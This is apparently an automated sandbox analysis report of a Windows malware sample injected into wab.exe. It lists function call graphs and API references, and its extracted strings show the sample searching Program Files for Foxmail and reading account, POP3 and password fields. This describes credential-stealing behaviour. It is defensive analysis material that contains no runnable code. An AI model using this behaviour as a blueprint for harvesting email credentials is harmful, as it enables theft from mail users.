6834->6837 6836 22792448 6838 22794808 6837->6838 6839 22794804 6837->6839 6842 22794815 6838->6842 6839->6836 6843 22795b7a __dosmaperr 20 API calls 6842->6843 6846 2279482c 6843->6846 6844 22792ada _ValidateLocalCookies 5 API calls 6845 22794811 6844->6845 6845->6836 6846->6844 7238 22794a9a 7239 22795411 38 API calls 7238->7239 7240 22794aa2 7239->7240 7978 2279679a 7979 227967a4 7978->7979 7980 227967b4 7979->7980 7981 2279571e _free 20 API calls 7979->7981 7982 2279571e _free 20 API calls 7980->7982 7981->7979 7983 227967bb 7982->7983 6847 2279281c 6848 22792882 std::exception::exception 27 API calls 6847->6848 6849 2279282a 6848->6849 7241 22793c90 RtlUnwind 7242 22798a89 7243 22796d60 51 API calls 7242->7243 7244 22798a8e 7243->7244 7245 2279508a 7246 2279509c 7245->7246 7247 227950a2 7245->7247 7248 22795000 20 API calls 7246->7248 7248->7247 6850 2279220c 6851 2279221a dllmain_dispatch 6850->6851 6852 22792215 6850->6852 6854 227922b1 6852->6854 6855 227922c7 6854->6855 6856 227922d0 6855->6856 6858 22792264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6855->6858 6856->6851 6858->6856 7249 22797a80 7250 22797a8d 7249->7250 7251 2279637b _abort 20 API calls 7250->7251 7252 22797aa7 7251->7252 7253 2279571e _free 20 API calls 7252->7253 7254 22797ab3 7253->7254 7255 2279637b _abort 20 API calls 7254->7255 7258 22797ad9 7254->7258 7257 22797acd 7255->7257 7256 22795eb7 11 API calls 7256->7258 7259 2279571e _free 20 API calls 7257->7259 7258->7256 7260 22797ae5 7258->7260 7259->7258 7744 22795303 7747 227950a5 7744->7747 7756 2279502f 7747->7756 7750 2279502f 5 API calls 7751 227950c3 7750->7751 7752 22795000 20 API calls 7751->7752 7753 227950ce 7752->7753 7754 22795000 20 API calls 7753->7754 7755 227950d9 7754->7755 7757 22795048 7756->7757 7758 22792ada _ValidateLocalCookies 5 API calls 7757->7758 7759 22795069 7758->7759 7759->7750 7760 22797103 GetCommandLineA GetCommandLineW

                    Executed Functions

                    Function 227910F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22791137
                    • lstrcatW.KERNEL32(?,?), ref: 22791151
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2279115C
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2279116D
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2279117C
                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22791193
                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 227911D0
                    • FindClose.KERNELBASE(00000000), ref: 227911DB
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                    • String ID:
                    • API String ID: 1083526818-0
                    • Opcode ID: 1da1b2d0541054ee57c797bc58e4316bd0835eee2d58cd4458278768185f57e7
                    • Instruction ID: c629ed5a84efa63084d6e00d5ca38c862cecc22b8859a3592f2636816b7fb942
                    • Opcode Fuzzy Hash: 1da1b2d0541054ee57c797bc58e4316bd0835eee2d58cd4458278768185f57e7
                    • Instruction Fuzzy Hash: 812173715483486BD711EA64DC4CF9B7BECEF84314F000D2AB958D3190E774D615CB96
                    Function 227912EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 22791434
                      • Part of subcall function 227910F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22791137
                      • Part of subcall function 227910F1: lstrcatW.KERNEL32(?,?), ref: 22791151
                      • Part of subcall function 227910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2279115C
                      • Part of subcall function 227910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2279116D
                      • Part of subcall function 227910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2279117C
                      • Part of subcall function 227910F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22791193
                      • Part of subcall function 227910F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 227911D0
                      • Part of subcall function 227910F1: FindClose.KERNELBASE(00000000), ref: 227911DB
                    • lstrlenW.KERNEL32(?), ref: 227914C5
                    • lstrlenW.KERNEL32(?), ref: 227914E0
                    • lstrlenW.KERNEL32(?,?), ref: 2279150F
                    • lstrcatW.KERNEL32(00000000), ref: 22791521
                    • lstrlenW.KERNEL32(?,?), ref: 22791547
                    • lstrcatW.KERNEL32(00000000), ref: 22791553
                    • lstrlenW.KERNEL32(?,?), ref: 22791579
                    • lstrcatW.KERNEL32(00000000), ref: 22791585
                    • lstrlenW.KERNEL32(?,?), ref: 227915AB
                    • lstrcatW.KERNEL32(00000000), ref: 227915B7
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                    • String ID: )$Foxmail$ProgramFiles
                    • API String ID: 672098462-2938083778
                    • Opcode ID: c88f470146465f9d33aadaa02090aa4937df02f263687ea366baffcd0d22f26d
                    • Instruction ID: 57be5a9d2e54c2c565718f02184ff9f6621aa5b9620ea7208a7eaf011e12fcc1
                    • Opcode Fuzzy Hash: c88f470146465f9d33aadaa02090aa4937df02f263687ea366baffcd0d22f26d
                    • Instruction Fuzzy Hash: 4F810671A4435CA9EB20DBA4EC85FEF7779EF84710F00059AF509F71A0EAB15A84CB94
                    Function 2279C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetModuleHandleA.KERNEL32(2279C7DD), ref: 2279C7E6
                    • GetModuleHandleA.KERNEL32(?,2279C7DD), ref: 2279C838
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2279C860
                      • Part of subcall function 2279C803: GetProcAddress.KERNEL32(00000000,2279C7F4), ref: 2279C804
                      • Part of subcall function 2279C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2279C7F4,2279C7DD), ref: 2279C816
                      • Part of subcall function 2279C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2279C7F4,2279C7DD), ref: 2279C82A
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcProtectVirtual
                    • String ID:
                    • API String ID: 2099061454-0
                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                    • Instruction ID: b57889215f354ffad6b37e32500a777594d632ddb53297aca731e63df3c53345
                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                    • Instruction Fuzzy Hash: 3F01D27094D741F8BE1257743D0BEBA6FD89B2F6A4B101B9EE24097193D9A08506C3A6
                    Function 2279C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 80 2279c7a7-2279c7bc 81 2279c82d 80->81 82 2279c7be-2279c7c6 80->82 83 2279c82f-2279c833 81->83 82->81 84 2279c7c8-2279c7f6 call 2279c7e6 82->84 85 2279c872 call 2279c877 83->85 86 2279c835-2279c83d GetModuleHandleA 83->86 92 2279c7f8 84->92 93 2279c86c 84->93 89 2279c83f-2279c847 86->89 89->89 91 2279c849-2279c84c 89->91 91->83 94 2279c84e-2279c850 91->94 95 2279c85b-2279c85e 92->95 96 2279c7fa-2279c7fc 92->96 97 2279c86d-2279c86e 93->97 99 2279c852-2279c854 94->99 100 2279c856-2279c85a 94->100 98 2279c85f-2279c860 GetProcAddress 95->98 96->97 101 2279c7fe 96->101 102 2279c870 97->102 103 2279c866-2279c86b 97->103 104 2279c865 98->104 99->98 100->95 101->104 105 2279c800-2279c80b GetProcAddress 101->105 102->91 103->93 104->103 105->81 106 2279c80d-2279c81a VirtualProtect 105->106 107 2279c82c 106->107 108 2279c81c-2279c82a VirtualProtect 106->108 107->81 108->107
                    APIs
                    • GetModuleHandleA.KERNEL32(?,2279C7DD), ref: 2279C838
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2279C860
                      • Part of subcall function 2279C7E6: GetModuleHandleA.KERNEL32(2279C7DD), ref: 2279C7E6
                      • Part of subcall function 2279C7E6: GetProcAddress.KERNEL32(00000000,2279C7F4), ref: 2279C804
                      • Part of subcall function 2279C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2279C7F4,2279C7DD), ref: 2279C816
                      • Part of subcall function 2279C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2279C7F4,2279C7DD), ref: 2279C82A
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcProtectVirtual
                    • String ID:
                    • API String ID: 2099061454-0
                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                    • Instruction ID: d7d71193a51ac4eb06007ec7c7b27070b868424d9c11c81849409493f29ddd8e
                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                    • Instruction Fuzzy Hash: D421367240C781EFEF128B746D0AFA67FD89B1F3A4F18069ED140CB183D5A89546C3A2
                    Function 2279C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 109 2279c803-2279c80b GetProcAddress 110 2279c82d 109->110 111 2279c80d-2279c81a VirtualProtect 109->111 112 2279c82f-2279c833 110->112 113 2279c82c 111->113 114 2279c81c-2279c82a VirtualProtect 111->114 115 2279c872 call 2279c877 112->115 116 2279c835-2279c83d GetModuleHandleA 112->116 113->110 114->113 118 2279c83f-2279c847 116->118 118->118 119 2279c849-2279c84c 118->119 119->112 120 2279c84e-2279c850 119->120 121 2279c852-2279c854 120->121 122 2279c856-2279c85e 120->122 124 2279c85f-2279c865 GetProcAddress 121->124 122->124 126 2279c866-2279c86e 124->126 129 2279c870 126->129 129->119
                    APIs
                    • GetProcAddress.KERNEL32(00000000,2279C7F4), ref: 2279C804
                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2279C7F4,2279C7DD), ref: 2279C816
                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2279C7F4,2279C7DD), ref: 2279C82A
                    • GetModuleHandleA.KERNEL32(?,2279C7DD), ref: 2279C838
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2279C860
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: AddressProcProtectVirtual$HandleModule
                    • String ID:
                    • API String ID: 2152742572-0
                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                    • Instruction ID: bb9fdc401c3e3f6ff590176caf0bd2049ccbdb3b726962d90124063a727e5e35
                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                    • Instruction Fuzzy Hash: 2EF0AF7154D740FCFE1247B43D47EB65FCC8B2F6A0B101A9EA200C7183D895850683F6

                    Non-executed Functions

                    Function 227960E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 227961DA
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 227961E4
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 227961F1
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 76f4aac46a38c3dd7c37f90f1aea9efa576439c1accf97b5239fdc51e3c536a4
                    • Instruction ID: 785061ddd910596bdbc16c19a74905c412547b9b01513df6aa617ccf81700f1e
                    • Opcode Fuzzy Hash: 76f4aac46a38c3dd7c37f90f1aea9efa576439c1accf97b5239fdc51e3c536a4
                    • Instruction Fuzzy Hash: D131D47494531C9BCB21EF28D988B8DBBB8BF18310F5042DAE81CA7250E7749B818F45
                    Function 22794AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,22794A8A,?,227A2238,0000000C,22794BBD,00000000,00000000,00000001,22792082,227A2108,0000000C,22791F3A,?), ref: 22794AD5
                    • TerminateProcess.KERNEL32(00000000,?,22794A8A,?,227A2238,0000000C,22794BBD,00000000,00000000,00000001,22792082,227A2108,0000000C,22791F3A,?), ref: 22794ADC
                    • ExitProcess.KERNEL32 ref: 22794AEE
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 8d2914b9b4a376fbda18bdf0d036e9ef3eb19113d6bdc7d23a480b4d70add39b
                    • Instruction ID: 384844e70a692db997a2d5f2b26ccabd5fa3dc15e36342495043910b95e2fd0b
                    • Opcode Fuzzy Hash: 8d2914b9b4a376fbda18bdf0d036e9ef3eb19113d6bdc7d23a480b4d70add39b
                    • Instruction Fuzzy Hash: A7E0B636148748AFCF027F68DE5CA4A3B6AEF40345B504524FE098B525DB39E943DA58
                    Function 2279724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: HeapProcess
                    • String ID:
                    • API String ID: 54951025-0
                    • Opcode ID: a2871df9eab89fa83f59dea2f8b21a8ef03613f0ddeb2223570a91c1fe80280a
                    • Instruction ID: 1dc4cddb2f597c98a3c9834e3790ef0d66ca483d454e473ca79ecb41fbe07500
                    • Opcode Fuzzy Hash: a2871df9eab89fa83f59dea2f8b21a8ef03613f0ddeb2223570a91c1fe80280a
                    • Instruction Fuzzy Hash: 6DA011302882028F83008E3A820A20C3AAEAA022A03000828BC08CA008EB3880028A00
                    Function 2279173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 139 2279173a-227917fe call 2279c030 call 22792c40 * 2 146 22791803 call 22791cca 139->146 147 22791808-2279180c 146->147 148 227919ad-227919b1 147->148 149 22791812-22791816 147->149 149->148 150 2279181c-22791837 call 22791ede 149->150 153 2279183d-22791845 150->153 154 2279199f-227919ac call 22791ee7 * 2 150->154 155 2279184b-2279184e 153->155 156 22791982-22791985 153->156 154->148 155->156 158 22791854-22791881 call 227944b0 * 2 call 22791db7 155->158 160 22791995-22791999 156->160 161 22791987 156->161 173 2279193d-22791943 158->173 174 22791887-2279189f call 227944b0 call 22791db7 158->174 160->153 160->154 164 2279198a-2279198d call 22792c40 161->164 168 22791992 164->168 168->160 175 2279197e-22791980 173->175 176 22791945-22791947 173->176 174->173 190 227918a5-227918a8 174->190 175->164 176->175 178 22791949-2279194b 176->178 180 2279194d-2279194f 178->180 181 22791961-2279197c call 227916aa 178->181 183 22791951-22791953 180->183 184 22791955-22791957 180->184 181->168 183->181 183->184 187 22791959-2279195b 184->187 188 2279195d-2279195f 184->188 187->181 187->188 188->175 188->181 191 227918aa-227918c2 call 227944b0 call 22791db7 190->191 192 227918c4-227918dc call 227944b0 call 22791db7 190->192 191->192 201 227918e2-2279193b call 227916aa call 227915da call 22792c40 * 2 191->201 192->160 192->201 201->160
                    APIs
                      • Part of subcall function 22791CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22791D1B
                      • Part of subcall function 22791CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22791D37
                      • Part of subcall function 22791CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22791D4B
                    • _strlen.LIBCMT ref: 22791855
                    • _strlen.LIBCMT ref: 22791869
                    • _strlen.LIBCMT ref: 2279188B
                    • _strlen.LIBCMT ref: 227918AE
                    • _strlen.LIBCMT ref: 227918C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _strlen$File$CopyCreateDelete
                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                    • API String ID: 3296212668-3023110444
                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                    • Instruction ID: e7e3a9545c7ba780941e46734fda0c2876e1d80c15a7c1f9764f783b122d5ced
                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                    • Instruction Fuzzy Hash: AB613571D08358AFEF12CBE4ED44BDEB7B9AF16314F004096D204BB260EB745A56CB52
                    Function 227919B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: %m$~$Gon~$~F@7$~dra
                    • API String ID: 4218353326-230879103
                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                    • Instruction ID: 4a534f9ba244548d359bee04d0e330595153c36f023479c4d81b181104d61301
                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                    • Instruction Fuzzy Hash: 24713AB1D093285BCF129BF5AC98AEF7BFC9F1A304F1040A6D644D7251E6749B85CBA0
                    Function 22797CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 279 22797cc2-22797cd6 280 22797cd8-22797cdd 279->280 281 22797d44-22797d4c 279->281 280->281 282 22797cdf-22797ce4 280->282 283 22797d4e-22797d51 281->283 284 22797d93-22797dab call 22797e35 281->284 282->281 285 22797ce6-22797ce9 282->285 283->284 287 22797d53-22797d90 call 2279571e * 4 283->287 293 22797dae-22797db5 284->293 285->281 288 22797ceb-22797cf3 285->288 287->284 291 22797d0d-22797d15 288->291 292 22797cf5-22797cf8 288->292 298 22797d2f-22797d43 call 2279571e * 2 291->298 299 22797d17-22797d1a 291->299 292->291 295 22797cfa-22797d0c call 2279571e call 227990ba 292->295 296 22797dd4-22797dd8 293->296 297 22797db7-22797dbb 293->297 295->291 301 22797dda-22797ddf 296->301 302 22797df0-22797dfc 296->302 305 22797dbd-22797dc0 297->305 306 22797dd1 297->306 298->281 299->298 307 22797d1c-22797d2e call 2279571e call 227991b8 299->307 311 22797ded 301->311 312 22797de1-22797de4 301->312 302->293 314 22797dfe-22797e0b call 2279571e 302->314 305->306 316 22797dc2-22797dd0 call 2279571e * 2 305->316 306->296 307->298 311->302 312->311 319 22797de6-22797dec call 2279571e 312->319 316->306 319->311
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 22797D06
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 227990D7
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 227990E9
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 227990FB
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 2279910D
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 2279911F
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 22799131
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 22799143
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 22799155
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 22799167
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 22799179
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 2279918B
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 2279919D
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 227991AF
                    • _free.LIBCMT ref: 22797CFB
                      • Part of subcall function 2279571E: HeapFree.KERNEL32(00000000,00000000,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?), ref: 22795734
                      • Part of subcall function 2279571E: GetLastError.KERNEL32(?,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?,?), ref: 22795746
                    • _free.LIBCMT ref: 22797D1D
                    • _free.LIBCMT ref: 22797D32
                    • _free.LIBCMT ref: 22797D3D
                    • _free.LIBCMT ref: 22797D5F
                    • _free.LIBCMT ref: 22797D72
                    • _free.LIBCMT ref: 22797D80
                    • _free.LIBCMT ref: 22797D8B
                    • _free.LIBCMT ref: 22797DC3
                    • _free.LIBCMT ref: 22797DCA
                    • _free.LIBCMT ref: 22797DE7
                    • _free.LIBCMT ref: 22797DFF
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: dd2da45bae9747105cf57da1d7160864c5f8c5357ed8e86be9b1da7e9e2b8e92
                    • Instruction ID: d86f50efa157627bf375ff0fbae89eb3a79065908bea1dfb51589adc2d080587
                    • Opcode Fuzzy Hash: dd2da45bae9747105cf57da1d7160864c5f8c5357ed8e86be9b1da7e9e2b8e92
                    • Instruction Fuzzy Hash: CB312FB1608305DFEB229B7EFA84BA677E9FF00354F104859E959DB191DF35AA80CB10
                    Function 227959D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • _free.LIBCMT ref: 227959EA
                      • Part of subcall function 2279571E: HeapFree.KERNEL32(00000000,00000000,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?), ref: 22795734
                      • Part of subcall function 2279571E: GetLastError.KERNEL32(?,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?,?), ref: 22795746
                    • _free.LIBCMT ref: 227959F6
                    • _free.LIBCMT ref: 22795A01
                    • _free.LIBCMT ref: 22795A0C
                    • _free.LIBCMT ref: 22795A17
                    • _free.LIBCMT ref: 22795A22
                    • _free.LIBCMT ref: 22795A2D
                    • _free.LIBCMT ref: 22795A38
                    • _free.LIBCMT ref: 22795A43
                    • _free.LIBCMT ref: 22795A51
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: e4b3894669642000fca4bc04c234af75d46e1476dac6c19dc3ae8e72b816d7d3
                    • Instruction ID: ccb08b7337d0fd96434866a6c2abc7b6d8403827008f4b5c2e34077fbe7c3676
                    • Opcode Fuzzy Hash: e4b3894669642000fca4bc04c234af75d46e1476dac6c19dc3ae8e72b816d7d3
                    • Instruction Fuzzy Hash: E511A27A528359EFCB22DF94E945CDD3FA9EF14350F0540A1BA088B221DA32EF509B80
                    Function 22791CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22791D1B
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22791D37
                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22791D4B
                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22791D58
                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22791D72
                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22791D7D
                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22791D8A
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
